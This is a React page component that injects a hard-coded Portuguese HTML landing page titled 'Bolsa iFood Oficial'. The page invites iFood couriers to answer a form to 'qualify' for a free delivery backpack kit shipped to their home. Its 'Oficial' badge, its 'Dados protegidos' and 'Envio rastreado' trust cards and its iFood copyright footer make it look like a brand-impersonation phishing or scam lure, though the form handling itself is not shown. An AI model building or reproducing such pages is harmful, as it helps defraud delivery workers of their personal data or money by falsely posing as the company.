import React from 'react';

const html = "<header class=\"header\">\r\n        <div class=\"logo-container\">\r\n            <img src=\"assets/ifoodentregadores.webp\" alt=\"iFood Entregador\" class=\"ifood-logo ifood-logo--wide\">\r\n        </div>\r\n    </header>\r\n\r\n    <noscript class=\"no-js\">Para continuar, ative o JavaScript no navegador.</noscript>\r\n\r\n    <main class=\"container\">\r\n        <section class=\"step fade-in-up\" aria-hidden=\"false\">\r\n            <div class=\"badge-container\">\r\n                <span class=\"badge\">Oficial</span>\r\n            </div>\r\n\r\n            <h1>Bolsa iFood Oficial</h1>\r\n            <p>Responda o formul&#225;rio para verificar se voc&#234; &#233; qualificado para receber o kit parceiro em casa.</p>\r\n\r\n            <div class=\"hero-image\">\r\n                <img src=\"assets/bagfoto-home.webp\" alt=\"Mochila iFood\" loading=\"eager\" decoding=\"async\"\r\n                    fetchpriority=\"high\">\r\n            </div>\r\n\r\n            <div class=\"benefits\">\r\n                <div class=\"benefit-item\">T&#233;rmica</div>\r\n                <div class=\"benefit-item\">Imperme&#225;vel</div>\r\n                <div class=\"benefit-item\">Expans&#237;vel</div>\r\n            </div>\r\n\r\n            <div class=\"action-stack\">\r\n                <button id=\"btn-start\" class=\"btn-primary\" type=\"button\">Quero participar</button>\r\n            </div>\r\n\r\n            <div class=\"trust-strip trust-strip--cards\">\r\n                <div class=\"trust-card\">\r\n                    <span class=\"trust-icon-wrap\">\r\n                        <img class=\"trust-icon-img\" src=\"assets/envio-rastreado.webp\" alt=\"Envio rastreado\">\r\n                    </span>\r\n                    <span>Envio rastreado</span>\r\n                </div>\r\n                <div class=\"trust-card\">\r\n                    <span class=\"trust-icon-wrap\">\r\n                        <img class=\"trust-icon-img\" src=\"assets/dados-protegidos.webp\" alt=\"Dados protegidos\">\r\n                    </span>\r\n                    <span>Dados protegidos</span>\r\n                </div>\r\n                <div class=\"trust-card\">\r\n                    <span class=\"trust-icon-wrap\">\r\n                        <img class=\"trust-icon-img\" src=\"assets/processo-rapido.webp\" alt=\"Processo r&#225;pido\">\r\n                    </span>\r\n                    <span>Processo r&#225;pido</span>\r\n                </div>\r\n            </div>\r\n\r\n        </section>\r\n    </main>\r\n\r\n    <div id=\"toast\" class=\"toast hidden\" role=\"status\" aria-live=\"polite\"></div>\r\n\r\n    <footer class=\"footer\">\r\n        <p>&copy; 2026 iFood. Todos os direitos reservados.</p>\r\n    </footer>";

export default function IndexPage() {
  return <div className="page-root" dangerouslySetInnerHTML={{ __html: html }} />;
}




